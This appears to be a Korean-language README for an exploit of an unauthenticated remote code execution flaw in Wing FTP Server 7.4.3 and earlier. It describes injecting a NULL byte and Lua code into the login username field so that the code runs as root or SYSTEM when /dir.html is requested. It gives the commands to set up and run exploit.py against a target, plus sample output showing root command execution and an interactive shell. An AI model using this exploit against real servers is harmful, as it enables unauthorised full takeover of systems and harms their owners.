
Wing FTP Server <= 7.4.3에서의 인증되지 않은 원격 코드 실행 취약점
Wing FTP Server <= 7.4.3의 인증되지 않은 원격 코드 실행 취약점입니다. 로그인 중
username매개변수에 NULL 바이트를 주입하면 Lua 코드가 세션 파일에 기록됩니다. 결과 세션 쿠키로/dir.html에 접근하면 주입된 코드가 실행됩니다. Linux에서는 root 권한으로, Windows에서는 SYSTEM 권한으로 실행됩니다.
/loginok.html로 보내 username 필드에 NULL 바이트와 Lua 코드를 주입합니다./dir.html에 GET 요청을 보내면 주입된 Lua 코드가 실행됩니다.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
예시:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root